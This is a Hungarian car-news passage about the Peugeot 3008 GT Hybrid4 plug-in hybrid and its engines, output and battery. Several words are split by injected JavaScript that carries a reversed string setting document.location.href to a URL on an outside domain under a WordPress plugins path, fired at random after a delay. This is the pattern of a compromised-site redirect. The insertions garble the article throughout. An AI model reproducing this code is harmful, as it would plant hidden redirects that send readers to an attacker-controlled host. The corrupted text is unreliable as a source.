Franciaországban már most elérhető, Európa más piacaira októberben érkezik meg a Peugeot 3008 GT Hybrid4, azaz a kompakt szabadidőjármű elektromos összkerékhajtású, konnektoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toros hibrid verziója. Az újdonság a 200 lóerős benzinmotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tort két villanymotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torral egészíti ki: a gyengébb, 110 lóerős egységet a nyolcfokozatú autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomata váltóba integrálták, míg a másik, 112 lóerős villanymotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor a hátsó tengelyt hajtja. Ez így együtt papíron 422 lóerő, de a hibridek nem így működnek: a valós rendszerteljesítmény 300 lóerő, ami így is minden idők legerősebb szériagyártású Peugeot modelljévé teszi a crossovert. Az első összkerékhajtású 3008-as 5,9 mp alatt gyorsul 100 km/órára, a 13,2 kWh kapacitású akkumulátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor WLTP norma…
- Hirdetés -